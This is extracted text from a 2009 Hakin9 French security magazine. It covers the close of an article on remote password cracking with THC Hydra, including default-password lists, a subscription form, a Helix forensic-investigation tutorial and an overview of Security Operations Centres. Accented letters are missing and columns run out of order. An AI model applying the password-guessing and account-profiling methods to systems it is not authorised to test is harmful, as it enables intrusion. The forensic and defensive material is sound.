Conclusion

Avec le dictionnaire de mots de passe potentiels prpar, il suffit de lancer l'Hydre avec les paramtres appropris :

Je n'ai prsent que trois exemples de l'utilisation pratique de l'Hydre. Si nous regardons toutefois la liste imposante de protocoles supports par le programme, il est facile d'imaginer que peuvent faire des intrus ingnieux. Ce programme permet de tester les sites Web protgs par un mot de passe, il supporte les protocoles chiffrs, de messageries et de bases de donnes et ce n'est qu'une partie de ses fonctionnalits. L'Hydre est donc actuellement l'un des outils les plus menaants utiliss par des hackers. Les administrateurs de systmes informatiques pourraient eux aussi apprivoiser l'Hydre car ce programme est un outil prcieux pour dtecter les

Sur le Net
http://nmap.org Nmap, http://www.phenoelit-us.org/dpl/dpl.html Phenoelit's Default Password List, http://www.cirt.net/cgi-bin/passwd.pl CIRT's Default Password List, http://www.virus.org/default-password Default Password Database, http://www.openwall.com/passwords/wordlists/password.lst les mots de passe le plus souvent utiliss http://ophcrack.sourceforge.net Ophcrack, http://freeworld.thc.org The Hacker's Choice Group, http://freeworld.thc.org/thc-hydra THC Hydra.

Pour terminer, je dois vous parler d'une chose importante. Les mthodes prsentes pour trouver les mots de passe aux systmes informatiques distants peuvent tre employes lgalement uniquement pour tester les faiblesses de nos propres systmes ! Obtenir un accs aux systmes informatiques trangers est puni par la prison. Il ne faut donc en aucun cas utiliser les procdures prsentes pour accder aux rseaux et aux ordinateurs qui ne sont pas les ntres. J'espre que j'ai russi attirer l'attention des administrateurs sur la grande menace des mots de passe par dfaut laisss et des mots de passe faciles deviner. Tester les mots de passe par dfaut et profiler les propritaires de comptes pour crer une liste de mots de passe potentiels qu'ils utilisent sont bien videmment des mthodes d'attaques des mots de passe pour les systmes distants. Les attaques consistant couter les transmissions et les mthodes de plus en plus populaires du type man in the middle constituent des exemples d'autres techniques pour cracker les mots de passe online . Mais c'est un sujet pour un article part. Il ne faut donc jamais oublier que les criminels informatiques connaissent les faiblesses humaines et en profiteront sans aucun tat d'me. De plus, il s'agit souvent de spcialistes qualifis dans le domaine des protections techniques d'informations. Paradoxalement les outils qu'ils emploient, tels que THC Hydra, peuvent servir aux administrateurs pour se protger contre les intrus car ils permettent de tester soi-mme les faiblesses des systmes administrs.

Karmic Koala VS Snow Leopard Cada vez que aparece una nueva versin de Ubuntu, es decir cada seis meses, algunos sitios y revistas especializadas
6/2009 HAKIN9 59

CONOMISEZ

22%

Hakin9 Comment se dfendre est le plus grand Bimestriel en Europe traitant de la scurit informatique. Vous trouverez dans nos pages des articles pratiques sur les mthode offensives et dfensives. Vous profiterez de programmes, de tutoriels, et de vidos pratiques.

Avec notre abonnement 35 EUR :

Vous conomisez 22% Vous recevez rgulirement les magazines votre domicile ! Vous obtenez un des nombreux cadeaux !

Choisissez votre propre mode dabonnement : par fax au numro : 00 48 22 427 32 87 par courrier : Software-Wydawnictwo Sp. z o.o. ul. Bokserska 1 ; 02-682 Warszawa ; POLOGNE par courrier lectronique : abo_fr@software.com.pl par notre internet en ligne : http://www.hakin9.org/prt/view/abonnez-vous.html

BULLETIN DABONNEMENT
comment se dfendre
Merci de remplir ce bon de commande et de nous le retourner par fax : 00 48 22 427 32 87 ou par courrier : Software-Wydawnictwo Sp. z o.o. ul. Bokserska 1 02-682 Warszawa Pologne/Polska Tl. 0 975180358 E-mail : abo_fr@software.com.pl
Prnom/Nom ........................................................................................ Entreprise ............................................................................................. Adresse ................................................................................................. ................................................................................................................ Code postal .......................................................................................... Ville ........................................................................................................ Tlphone ............................................................................................. Fax ......................................................................................................... Je souhaite recevoir l'abonnement partir du numro .................... ................................................................................................................ En cadeau je souhaite recevoir ....................................................... ................................................................................................................ E-mail (indispensable pour envoyer la facture) ................................ ................................................................................................................

PRIX DABONNEMENT HAKIN9 COMMENT SE DFENDRE : 35

Je rgle par : Carte bancaire n CB

code CVC/CVV

Abonnez-vous et recevez un cadeau !

expire le _______________ date et signature obligatoires type de carte (MasterCard/Visa/Diners Club/Polcard/ICB)

Virement bancaire : SOCIT GNRALE CHASSE/RHNE banque guichet numro de compte cl 30003 01353 00028010183 90 IBAN : FR76 30003 01353 00028010183 90
Adresse Swift (Code BIC) : SOGEFRPP (Veuillez prciser le numro de la facture pro forma dans le titre de virement.)

Pierre Therrode

Degr de difficult

PRATIQUE Helix, rponse une intrusion

Avec l're de l'internet, nous sommes tous conscients d'tre des cibles potentielles pour les pirates. en effet, la criminalit sur le net est de plus en plus prsente dans cette nouvelle perspectives de technologies, les intrusions dans un systme touchant aussi bien les simples utilisateurs que les entreprises. Toutefois, il est possible que de tels agissements puissent tre sauvegards afin de les analyser comme lments de preuves.

Cet artiCle explique...

Ce qu'est helix Comment mener une investigation Ce qu'il faut savoir... Connatre Linux tre capable de travailler en mode console 60 HAKIN9 6/2009

l'heure actuelle, il existe de nombreuses socits qui permettent de traiter avec un professionnel afin de rpondre une intrusion dans un systme. Le professionnel qui est gnralement un expert, va par le biais de ses comptences pouvoir analyser le systme, collecter et sauvegarder tous renseignements qui serviront par la suite comme lments de preuve devant le tribunal. Dans le milieu du computer forensic, il existe deux grosses socits qui se sont implanter dont AccessData, qui produit le logiciel Forensic Toolkit, ainsi que la socit Guidance avec le logiciel Encase Field Intelligence Model. Cependant ces deux logiciels sont extrmement chres (compter plus de 3 4 milles euros chaque logiciels) et ils sont principalement destins aux forces de l'ordre ou tout autre organisme de lutte anti-cybercriminalit qui est accrdit par le gouvernement. Lorsque l'intrusion informatique touche les petites et moyennes entreprises, il est gnralement difficile pour des raisons financires de faire appel ces logiciels, surtout si les pertes ventuelles sont infrieures au prix de l'investigation. Nanmoins, les petites entreprises ainsi que les utilisateurs victimes de tels mfaits, peuvent se tourner vers des solutions open-source qui offrent un panel d'outils ncessaires dans l'investigation forensic.

Pour cela, la socit e-fense dvelopp le logiciel Helix qui est capable de rpondre de tels besoins. Il est not, que ce systme est de plus en plus utilis dans les centres de formations spcialiss (e-fense Training, C.H.F.I, SANS 508, etc...) Avant de continuer la lecture de cet article, j'invite le lecteur nophyte prendre connaissance de l'article de Konrad Zuwala qui traite de l'analyse aprs l'attaque

la prise en main

Comme nonc plus haut, Helix est un ensemble d'outils spcialiss dans l'investigation forensic et de ce fait, il permet de mener bien des enqutes lies la criminalit informatique. L'avantage majeur de ce produit, est qu'il est entirement gratuit (sauf pour les versions "pro" et "entreprise", car il utilise la licence EULA). Certes, il est vrai que les outils commerciaux distribus par AccessData et Guidance prsentent des outils plus pointus, mais le recours Helix permet de rduire considrablement les cots d'une telles investigations. Concernant la configuration matriel ncessaire, cette distribution peut tre utilise en mode console avec un processeur x86 et 48 Mo de mmoire. Pour ce qui est du mode graphique, l'interface bureautique XFCE fourni avec Helix

HELIX
Comme nonc plus haut, Helix offre de nombreux outils d'enqute, notamment avec des programmes tels que Sleuth Kit avec Autopsie (Figure 2) ou encore LinEn. Outre cela, le systme contient des outils d'analyse spcifiques Windows dont Regviewer ainsi que d'autres utilitaires pour pouvant s'adapter aussi Linux, comme par exemple des logiciels antivirus ou anti-rootkit. Afin de pouvoir analyser le contenu du disque, dans l'espoir de pourvoir trouver des pistes et sans pour autant modifier le modifier, Helix possde des utilitaires pouvant analyser l'image d'un disque. Concernant l'acquisition d'une image mdia, il est possible de l'extraire distance. Ce qui dans certains cas peut tre intressant car si le systme attaqu contient un programme malveillant, cela peut viter toute intervention de celui-ci. Pour raliser une image du disque, l'utilisateur peut tirer profit de la puissance de certains outils, dont: Adepto, qui est un outil permettant d'obtenir assez rapidement une image conforme au disque, tout en "capturant" les ventuelles erreures de systme ainsi que les fichiers corrompus (Figure 3). LinEn, est un outils dvelopp par la socit Guidance Software (cette

Figure 1. Aperus du menu a besoin d'au minimum d'un processeur Pentium et 128 Mo de RAM. Enfin, le recours au live CD fonctionne sans aucun soucis avec un processeur Pentium II 300 MHz et 256 Mo de RAM. Bien entendu, le systme est capable de reconnatre bon nombres de supports externes qui composent un ordinateur. Il est noter que la suite d'outils Helix 1.9 est bas sous Ubuntu et qu'il peut tre installer sur le disque dur grce au script knx2hd, mais que l'utilisation du live CD lors d'une investigation est plus recommande. Outre le recours au live CD, l'une des forces principales de Helix, est qu'il peut tre lanc depuis une session Windows. En effet, une fois le CD insr dans le lecteur, la suite Helix s'excute avec une fentre d'alerte qu'il faut avant tout accepter. Une fois que vous avez slectionn votre langage et approuv les termes, une nouvelle fentre s'affiche avec les outils prs l'emploi, comme le montre la figure 1. Cette premire utilisation permet entre autre de diagnostiquer les premires pistes suite au passage d'un pirate, grce des outils comme WinAudit qui permet de regrouper toutes les caractristiques de l'ordinateur, Wimen qui permet d'acqurir une image de la mmoire RAM, ou encore divers outils allant de la rcupration de donnes volatiles (Nigilant32) aux mots de passes (Mail Password Viewer, Network Password Viewer, etc...), ainsi que des programmes pouvant rechercher dans la base de registre toutes traces de modifications (Registre Viewer). Une fois les premires pistes repres, il faut redmarrer l'ordinateur pour pouvoir utiliser le live CD et ainsi continuer l'investigation.

Figure 2. Aperus de Autopsie

6/2009 HAKIN9 61

PRATIQUE
L'investigation en elle mme, se droule en quatre tapes: l'identification la collecte de donnes l'analyse le bilan

Inspection du disque et des connexions

Avant tout, il est primordial de savoir sur quel systme l'investigation lieu, sur quel type de disque (FAT, NTFS, ufs, ffs, ext2/ext3, reiserfs, etc...) ainsi que la taille de la partition. Ces renseignements serviront par la suite collecter au mieux les informations prsent sur le mdia. Il est sans rappeler qu'avant tout procder, il est judicieux de faire une copie du disque, et de le garder sur un autre support amovible (disque dur externe, cl USB, etc...). Pour mener bien cette enqute, il ncessaire de procder l'analyse du contenu du disque et du rseau avec des commandes spcifiques qui sont les suivantes: Commande permettant de copier un disque pour en savoir un peut plus: effectuer une copie sur un mdia annexe, afin de l'analyser plus tard avec Adepto: cp-rp rpertoire_source

Figure 3. Aperus du logiciel Adepto mme socit qui a dveloppe le logiciel Encase) et qui permet d'obtenir au mme titre que Adepto, une image du disque dur (Figure 4). Une fois l'image du disque acquise, l'analyse de son contenu peut commencer en recherchant toute(s) trace(s) de l'intrusion, tous les fichiers cachs, ainsi que les moindres dtails qui pourraient influencer les recherches. L'analyse des logs (ce que nous verrons plus loin) galement son importance, car cela permet d'obtenir le maximum d'information sur le type d'attaque ainsi que sur les mthodes employs. Toutes ces traces peuvent mener l'origine de l'attaque. Dans le mme ordre d'ide, le logiciel Retriever permet de rechercher les fichiers les plus couramment utiliss, tels que les images, les vidos, documents textes, ainsi que les mails. Outre le fait de pouvoir analyser le systme Linux et Windows, Helix possde un outils nomm Macinthos HFS permettant de pouvoir analyser le systme Mac (Figure 5). Enfin, le logiciel Registry Viewer, permet de consulter la base de registre du systme Windows et le logiciel Bless Hex Editor est un logiciel Hexadcimal permettant une analyse plus approfondi du systme.
62 HAKIN9 6/2009

l'investigation en elle mme

Toutes investigations ncessite de prendre des prcautions en matire de manipulations et de choix des outils. Lors de la collecte de preuves, il ne faut pas laisser le moindre indice suspect de cot car cela peut renseigner sur les mthodes utilises par le pirate (t-t-il presser ?, quel outils a t-il utilis ?, l'attaque venaitelle de l'intrieure ou de l'extrieure ?, etc...).

Figure 4. LinEn, l'un des logiciels de Guidance Software

HELIX

Liste des diffrents log analyser selon le systme

Sous IRIX: /var/adm/SYSLOG /var/adm/sulog /var/adm/utmp /var/adm/utmpx /var/adm/wtmp /var/adm/wtmpx /var/adm/lastlog/username /usr/spool/lp/log /var/adm/lp/lpd-errs /usr/lib/cron/log /var/adm/loginlog /var/adm/pacct /var/adm/dtmp /var/adm/acct/sum/loginlog /var/adm/X0msgs /var/adm/crash/vmcore /var/adm/crash/unix sous AIX: /var/adm/pacct /var/adm/wtmp /var/adm/dtmp /var/adm/qacct /var/adm/sulog /var/adm/ras/errlog /var/adm/ras/bootlog /var/adm/cron/log /etc/utmp /etc/security/lastlog /etc/security/failedlogin /usr/spool/mqueue/syslog sous SunOS: /var/adm/messages /var/adm/aculogs /var/adm/aculog /var/adm/sulog /var/adm/vold.log /var/adm/wtmp /var/adm/wtmpx /var/adm/utmp /var/adm/utmpx /var/adm/log/asppp.log /var/log/syslog /var/log/POPlog /var/log/authlog /var/adm/pacct /var/lp/logs/lpsched /var/lp/logs/lpNet /var/lp/logs/requests /var/cron/log /var/saf/_log /var/saf/port/log sous Linux: /var/log/lastlog /var/log/telnetd /var/run/utmp /var/log/secure /root/.ksh_history /root/.bash_history /root/.bash_logut /var/log/wtmp /etc/wtmp /var/run/utmp /etc/utmp /var/log /var/adm /var/apache/log /var/apache/logs /usr/local/apache/log /usr/local/apache/logs /var/log/acct /var/log/xferlog /var/log/messages /var/log/proftpd/xferlog.legacy /var/log/proftpd.access_log /var/log/proftpd.xferlog /var/log/httpd/error_log /var/log/httpd/access_log /etc/httpd/logs/access_log /etc/httpd/logs/error_log /var/log/httpsd/ssl.access_log /var/log/httpsd/ssl_log /var/log/httpsd/ssl.access_log /etc/mail/access /var/log/qmail /var/log/smtpd /var/log/samba /var/log/samba-log.%m /var/lock/samba /root/.Xauthority /var/log/poplog /var/log/news.all /var/log/spooler /var/log/news /var/log/news/news /var/log/news/news.all /var/log/news/news.crit /var/log/news/news.err /var/log/news/news.notice /var/log/news/suck.err /var/log/news/suck.notice /var/spool/tmp /var/spool/errors /var/spool/logs /var/spool/locks /usr/local/www/logs/thttpd_log /var/log/thttpd_log /var/log/ncftpd/misclog.txt /var/log/ncftpd.errs /var/log/auth

effectuer une copie distance l'aide de netcat (il est not que ce procder est aussi ralisable avec la suite de logiciels sous Windows): nc -p 1234 -l > Dossier_Cible effectuer une copie de la partition: dd if =/dev/disque_source = /dev/disque _cible effectuer une recherche de toutes les opration contenu dans la mmoire: dd if =/dev/mem of =fichier_mmoire

lister les bibliothques de processus: ltrace-p [pid] lister les processus en cours d'excution: ps -aux ps -auexww afficher les appels systme: strace-p [pid]

retracer une adresse IP: traceroute adresse_IP

Par la suite, il faut lancer une analyse plus approfondie du systme, tout en prenant soin de ne plus se trouver connect au rseau.

Information sur le rseau: trouver divers informations concernant les connexions rseau: netstat -a lister les ports ouverts: netstat -an lister les ports inhabituellement ouverts: netsat -nap, lsof -i voir toutes les adresses Mac: arp -a capturer le trafic rseau: tcpdump -w

Inspection du systme
L'une des rgles d'or lors d'une investigation forensic, est de ne jamais faire confiance aux programmes qui sont prsents sur un systme compromis. En effet, un programme d'apparence inoffensif peut trs bien cacher un rootkit ou tout autres malwares qui auraient pour fonction, une fois excut, d'effacer un dossier sensible ou rendre l'tude forensic impossible.
6/2009 HAKIN9 63

Information sur les adresses et les processus: lister la gestion des adresses dans les processus mmoires: ps -ealf

PRATIQUE
antivirus. En effet, lors de la confrences du Black-hat en 2005, deux Hackers (James Butler et Sherri Sparks) ont prsent le projet Shadow Walker, avec un prototype de rootkit permettant de manipuler directement les pages de la mmoire physique. Ces nouvelles gnrations de rootkits rsident et agissent uniquement dans la mmoire physique et ce-ci, afin d'viter toutes dtections d'antivirus tout en contrant les techniques forensics traditionnelles... Il faut donc rester vigilant, lors de l'investigation d'un disque dure.

et aprs ?

Figure 5. Aperus du logiciel Macinthos HFS Pour cela, il est judicieux de lancer le systme Helix depuis le Live CD et d'analyser le systme compromis de faon annexe (en prenant soin d'avoir au par avant ralis une copie du disque). Suite ces manipulations il est bon d'examiner logs, dont certains en particulier: /var/log/messages, est un fichier systme qui rcupre tout, tels que les messages ainsi que les programmes qui ont t lanc durant une session. /var/log/secure, contient toutes les informations de connexions. /var/log/maillog, log contenant les enregistrements du trafic de courrier entrant et sortant. /var/log/spooler, est un fichier contenant tous les messages d'erreurs des daemons uucp et innd /var/log/boot.log, contient tous les messages de dmarrage lors du lancement du systme classique (Figure 6), ainsi que les antirootkit comme chkrootkit et rkhunter (ne l'ayant pas trouv dans la distribution, je conseil tout de mme de le tlcharger pour pouvoir l'utiliser). Pour le lecteur curieux d'en savoir plus sur le fonctionnement de ClamAV, je l'invite prendre connaissance de l'article de Thomas Kojm paru dans le n21 de Hakin9. Nanmoins, il ne faut pas avoir une confiance aveugle dans les rsultats des

Suite une attaque, le nombre de traces laisses par le pirate dpendra de ses comptences en matire de piratage. Ceux qui laissent des traces de leur(s) passage(s) offrent aux spcialistes une mine de renseignements pouvant donner lieux des arrestations. Pour mener bien ses recherches, l'expert peut s'aider du logiciel Sleuth Kit avec Autopsie. IL faut aussi porter une attention toute particulire sur les fichiers qui ont t effacs et se demander pourquoi celui-ci et pas un autre (socit qui cherche couler son concurrent, fichier sensible relatif un groupe ou une personne,...tout en les mettant

Si l'intrusion est prsente sur un autre systme, j'invite le lecteur prendre connaissance de l'encadrer suivant. IL faut par la suite continuer l'investigation en lanant des logiciels antivirus et anti-rookits. On pense alors aux programmes comme ClamTk (version amlior de ClamAV) et XFPROT, dont l'utilisation est similaire un antivirus
64 HAKIN9 6/2009

Figure 6. Aperus des logiciels antivirus ClamTk et XFPROT

HELIX
lment de preuve devant un tribunal. En effet, les informations contenues dans l'image peuvent renseigner sur la date du piratage, les modifications ventuelles des fichiers, ainsi que les droits auxquels le pirate eux durant son intrusion dans le systme.

Sur Internet
http://www.e-fense.com/products.php Site officiel de la socit e-fense http://www.accessdata.com Site officiel de la socit AccessData http://www.guidancesoftware.com Site officiel de la socit Guidance http://www.forensicswiki.org/wiki/Main_Page Page Wiki contenant des informations et des outils Open-Source lis l'investigation forensic http://www.hsc.fr/ressources/breves/hackresponse.html trs bonne lecture ralis par le cabinet de scurit HSC concernant la rponse une intrusion http://www.sans.org/score/checklists/ID_Linux.pdf Aide mmoire en rponse une intrusion sous Linux http://www.sans.org/score/checklists/ID_Windows.pdf Aide mmoire en rponse une intrusion sous Windows http://www.opensourceforensics.org Site regroupant de nombreux outils open-source pour l'investigation forensic http://wiki.backtrack-fr.net/index.php/Liste_des_fichiers_logs page regroupant tous les logs de chaque systmes (Red Hat/Mac OSX, Solaris, Debian, Windows, Linux, etc...) http://www.thetrainingco.com/pdf/Monday/Techno%20Forensics%2020071029%20NDon nelly%20Macintosh%20Imaging.pdf Compte rendu d'une confrence sur les mthodes forensic sur Mac, Windows et Linux http://rkhunter.sourceforge.net Pogramme rkhunter http://ourmon.sourceforge.net Projet Ourmon http://www.informit.com/store/product.aspx?isbn=0321591801 Practical Intrusion Analysis: Prevention and Detection for the Twenty-First Century, livre traitant de la scurit et des intrusions dans un rseau http://www.blackhat.com/presentations/bh-jp-05/bh-jp-05-sparks-butler.pdf Prsentation du projet Shadow Walker lors du Black-hat 2005

Conclusion

A travers cet article, nous avons donc vu que la suite Helix prsente des outils pouvant mener bien une tude forensic. Toute de fois, cela peut parfois s'avrer (trs) difficile si l'on n'est pas expert ou si le pirate fait en sorte d'effacer correctement toutes les traces de son passage. En matire d'apprentissage en criminologie informatique, cela require du temps et de la patience. Bien videment dans ce milieu, les personnes qui accrditent les faits sont des experts certifis, et c'est donc pour cela que faire appel leurs services permet de pouvoir gagner un temps prcieux si le piratage est port devant les tribunaux.

en corrlation avec les vnements produits.) Toute fois, les pirates qui arrivent s'introduire dans un systme, prennent soin de camoufler leur venu ainsi que leur prsence en utilisant des backdoors ou des rootkits afin de pouvoir revenir sur le systme. Face cela, l'expert peut tudier

le rseau l'aide du logiciel Wireshark ou Ourmon (s'il souponne la prsence la prsence d'une machine zombie). Une fois toutes les tapes ralises, il ne reste plus qu' les porter devant le tribunal. Tout lments d'image d'un disque dur ayant subit un piratage, est un PUBLICIT

propos de l'auteur

L'auteur est actuellement en premire anne de BTS informatique au lyce Bahuet Brive. Autodidacte, il se passionne pour la programmation ainsi que la scurit depuis l'age de 15 ans. Paralllement cela, il est prsent sur le site Devellopez.com et contribue l'change de savoir dans la communaut entant que rdacteur scurit. Il peut tre contact l'adresse suivante: thpierre@redaction-developpez.com

6/2009 HAKIN9

65

PRATIQUE
Helmi RAiS

Les Centres Oprationnels de Scurit

Cet article prsente une vue globale sur les SOC ainsi que les diffrents lments ncessaires sa mise en place.

Degr de difficult

Introduction

Cet artICle explIQue...

les missions d'un SOC, l'interaction du SOC avec les autres entits du Si, les diffrents composants logistiques et techniques pour la mise en place d'un SOC,

Aujourdhui, il nest pas commun de rencontrer des RSSIs qui puissent affirmer connaitre en temps rel l'tat des attaques ciblant leurs systmes d'informations ou mme de prsenter les statistiques sur les diffrents incidents de scurit des dernires 48 heures. Pour plusieurs raisons, le service de supervision de la scurit du SI a t toujours considr comme non prioritaire, au profit de ceux relatifs lintgration ou de laudit de scurit. Le calcul d'un retour sur investissement de la scurit informatique n'est pas un sujet facile. Pourtant avec son activit, ses tableaux de bord, ses rapports et ses statistiques, le centre oprationnel de scurit ou SOC (Security Operation Center) rendra l'investissement rel et justifiera toutes les dpenses effectues pour tous les solutions de scurit mis en place. Cet article prsente une vue globale sur les SOC ainsi que les diffrents lments ncessaires sa mise en place.

Outre la supervision et l'analyse des diffrentes alertes des quipements de scurit ( Firewall, IDS, HIDS, Antivirus, Anti spam, NAC, VPN), OS et applications du SI, le SOC tachera identifier les nouvelles menaces affectant le SI (Vulnrabilits, Malwares) et superviser la conformit aux politiques de scurit internes et aux diffrents standards de scurit. Comme activit quotidienne, le SOC aura analyser et qualifier la criticit des vnements, notifier les entits concernes, fournir un ensemble de recommandations ou palliatifs et effectuer par la suite le reporting et le suivi du plan daction. Le SOC devra donc rendre compte au RSSI en lui prsentant ses rapports et analyses. Il devra galement interagir avec les autres entits pour discuter des recommandations et palliatifs adquats. En gnral, il faudrait entre 3 et 6 mois pour mettre en place un SOC. Il y a pour cela 3 scnarios possibles.

Scnario 1: Infogrance

Ce Qu'Il faut SavOIr...

Gestion des risques oprationnels, Gouvernance de la scurit informatique, 66 HAKIN9 6/2009

Qu'est ce qu'un SOC?

Le SOC est une entit capable de garantir une veille permanente, 7j/7 et 24h/24, sur la scurit de votre systme d'information et de ragir en cas d'attaque (propagation virale).

Il s'agit d'outsourcer ce service vers une quipe ddie qui a les comptences ncessaires et qui est externe l'entreprise. Il est vrai que cette option pourrait tre la moins couteuse et celle qui garantit le plus d'objectivit et le moins de collision entre les quipes.

LeS CeNtreS OprAtIONNeLS de SCurIt

Cependant, dans la majorit des cas, cette quipe ne connait pas tous les dtails de l'environnement de travail, ce qui conduirait une inefficacit du traitement des risques et de l'interprtation des donnes, en plus d'un problme majeur relatif la garantie de la confidentialit des donnes, des alertes et des incidents.

Scnario 2: Chaque quipe (systme, rseau, scurit) aura son propre SOC
C'est vrai que ces groupes internes connaissent trs bien l'environnement de travail mais n'ont pas forcment un background de scurit. En plus, l'effort global sera dupliqu entre les activits quotidiennes, la dtection, la remonte et l'analyse des alertes de scurit.

Scnario 3: un SOC central

Ici le potentiel d'efficacit est plus important : cette quipe est cense non seulement connaitre les dtails du SI (plus qu'un infogrant) mais aussi avoir travaill sur l'ensemble des solutions qui y existent. Le plus grand avantage est la possibilit de corrlation entre les diffrents groupes dune part et entre les diffrentes alertes dautre part. Ceci permettrait de garantir une qualit d'analyse plus importante et un taux de faux positifs moins lev. L'inconvnient majeur de cette solution serait peut tre son cout en matire de consommation de moyens techniques et de ressources. A noter que comme tout nouveau projet fort impact sur le SI , il est ncessaire de dfinir une stratgie d'information et de sensibilisation auprs de toutes les quipes impactes, y compris la DRH, le service juridique et la scurit physique.

Figure 1. Quadrant magique des solution SIEM D'ailleurs, tous les SOC joints avec des NOC se voient toujours les ressources et le financement absorbs. En ralit, les administrateurs systmes et rseaux ne peuvent pas assurer cette fonction, parce que premirement, ces quipes ne comportent pas forcment des experts en scurit ayant les, connaissances ncessaires pour traiter les risques, conduire des analyses et dcider des palliatifs. Ce sont des quipes trs charges par leurs tches et dont la disponibilit des services LAN/WAN est leur premire priorit au profit du traitement des alertes de scurit. Il ne faut pas oublier que les membres du NOC ont les droits d'accs aux routeurs, firewalls, IDS, serveurs, etc. La conservation des principes de privilges minimum et sparation des tches est trs importante dans notre cas. Puisqu'on ne peut pas tre juge et partie en mme temps! Ainsi le SOC devrait avoir uniquement des droits d'accs en lecture aux diffrents Logs. Les membres du SOC devraient avoir les comptences et les formations ncessaires leurs permettant d'identifier des signatures d'attaques, d'en comprendre l'origine et le scnario et d'identifier les palliatifs immdiats pour les contrer.

SOC et CSIrt

SOC et NOC

Le SOC (Security Operation Center) et le NOC (Network Operation Center) devraient tre, mon avis, des entits compltement indpendantes.

Dans plusieurs cas, la tache SOC est attribue l'unit CSIRT (Computer Security Incident Response Team) existante. A mon avis, c'est le scnario idal. Cette quipe dj en place, connait l'environnement de travail, a dj son rseau de collaboration et effectue des taches de veille sur les menaces et vulnrabilits affectant le SI.
6/2009 HAKIN9 67

PRATIQUE
SOC et Helpdesk
Le Helpdesk peut tre un partenaire trs important dans le rseau du SOC. En partageant les incidents relatifs aux anomalies de fonctionnement ou aux problmes de scurit (virus, spywares, etc.), le Helpdesk peut fournir au SOC des informations trs prcieuses pour son activit. Au dmarrage, le service peut tre lanc une ou deux personnes mais lquipe devrait rapidement atteindre le nombre de 8 afin dassurer une veille 7j/7 24h/24. Procdure de gestion de crise, Gestion des vidences lectroniques, Procdure d'nalyse en profondeur et dtection dintrusion Partage dinformations et de connaissances,

SIeM : Security Information and event Management

Appel galement SEM (Security Event Management) ou SIM (Security Information Management), ce type de solution permet de donner une vision globale de la scurit et de son volution au quotidien. Ils permettent de concentrer et de corrler les logs des diffrents quipements (rseau et scurit), serveurs et applications dans une seule plateforme. Plusieurs de ces outils permettent de veiller au respect des politiques de scurit et de rpondre aux nombreux audits de conformit (Sarbanes Oxley, PCI, ISO27001, SAS70...). Dans le march des SIEM il existe plusieurs solutions plus au moins matures : enVision (RSA), Arcsight (ESM), SCC (Computer Associates), SMS (Exaprotect), TSIM/TSOM (IBM), Security Manager (Intellitactics), Foundstone (McAfee), Security Manager (NetIQ), Monitoring Center (Netreport), OSSIM, Defense Center (SourceFire) et SIM (Symantec), CS-MARS (Cisco). Le groupe Gartner a publi en 2007 son Magic Quadrant for Security Information and Event Management qui prsente une tude comparative dtaille de ces diffrentes solutions. En gnral voici les fonctionnalits d'une solution SIEM :

ressources humaines

Comme le SOC devrait tre totalement fonctionnel 24h/24 et 7j/7, il est vident quun plan de continuit d'activit soit en place et que la mobilit des membres de l'quipe soit assure. Le SOc doit continuer travailler mme si le centre primaire n'est plus disponible.

En plus et afin de simplifier la tche, il serait intelligent que les membres du SOC seraient recruts des diffrentes quipes existantes (systme, rseau, etc.) ayant une vision complte sur lenvironnement et les diffrents quipements et solution utilises. Les critres de choix peuvent tre relatifs l'exprience, la comptence technique mais galement l'attitude de la personne recrute: curiosit, logique, capacit comprendre et voluer et surtout une trs grande thique. Il ne faut pas oublier que ces personnes seront charges de traiter des donnes confidentielles relatives aux attaques subies; et dont on ne voudrait absolument pas trouver les chos ailleurs. Un plan de formation devrait tre mis en place pour les membres du SOC. Plusieurs formations offertes par linstitut SANS, le CERT/CC ou lEC-Council propos de la gestion des incidents, l'analyse des intrusions et l'investigation sur incident peuvent tre envisages.

Moyens techniques

Les moyens techniques ncessaires l'activit d'un SOC sont les suivants: Console centrale permettant de corrler les logs et de visualiser les alertes de scurit, Systme de gestion de Tickets afin d'assurer le suivi des incidents et des alertes, Une base de connaissances avec un forum de discussions, avec moteur de recherche Laboratoire de test : copie de tous les produits de l'environnement de production (tester les exploits, les vmware et mulateurs),

Dans ce qui suit quelques dtails sur les deux premires solutions :

procdures

La mise en place de ces procdures rduit les confusions et rend le traitement des risques plus efficace. Plusieurs travaux ont t effectus et publis dans ce sens, il convient juste les personnaliser. Procdures de gestion d'incidents, Procdure de gestion des risques et menaces (vulnrabilit, malwares, etc.),
68 HAKIN9 6/2009

Figure 2. Capture d'cran d'OTRS

LeS CeNtreS OprAtIONNeLS de SCurIt

Consolidation des logs, Corrlation des menaces : Utilisation de l'intelligence artificielle afin de trier les journaux et d'identifier les sources d'attaques, Gestion des vulnrabilits, Gestion des incidents, Notification email, pagers, MOM, HP Openview, Cration de tickets, Automatisation des rponses excution de scripts, L'archivage des rponses et actions de remdiations., Reporting Efficacit oprationnelle, Conformit / ISO, SOX, HIPPA, FISMA., Ad Hoc / Investigations, les applications maison., Les fonctionnalits de reporting, de tableaux de bord et de respect de la conformit aux politiques de scurit,., La qualit du moteur et algorithmes de corrlation , Le nombre d'quipements supports, Le type de stockage support (bases de donnes, fichiers plats).

Sur Internet
http://www.gartner.com http://www.otrs.com/en/products/ sirios/ http://securosis.com/research/simsiem-and-log-management/ http://www.iv2-technologies.com/ SOCConceptAndImplementation.pdf http://www.cert.org http://www.sans.org/

Systmes de gestion de tickets

Il existe dans le monde libre plusieurs systmes de gestions des tickets pour diffrents types d'usages (gestion de parc informatique, etc.). Ecrit en perl, OTRS (Open-source Ticket Request System) est peut tre l'un des plus connus. Destin rpondre aux besoins d'un CSIRT, l'application SIRIOS peut tre trs utile pour la gestion du flux de travail au sein d'un SOC. Bas sur OTRS , il permet de raliser et d'enregistrer toute la correspondance de la rsolution d'un incident (e-mail, tlphone, note interne...). SIRIOS est constitu d'une srie de modules pour OTRS : module Incident : permet de grer des incidents base du format XML

Les solutions SIEM du march se diffrencient par: Le type de la solution: logicielle ou Appliance, L'architecture de dploiement (centralise ou distribues), La granularit de la personnalisation de lapplication, en particulier en matire de gestion des quipements des vulnrabilits, l'ajout des rgles de corrlation ou des format de logs pour

IODEF (incident object description and exchange format), module Advisory : permet de gnrer des avis de scurit sous le format XML EISPP/DAF (European security promotion programme), module Vulnerability : une base de donnes de vulnrabilits pouvant tre enrichies par des bases existantes, module Artefact : permet de sauver (valeur de hachage) et de grer les artefacts (exploits, logs...) analyser, module WebWatcher : surveillance de site Web, Console IDMEF (intrusion detection message exchange format), Base de contacts.

Conclusion

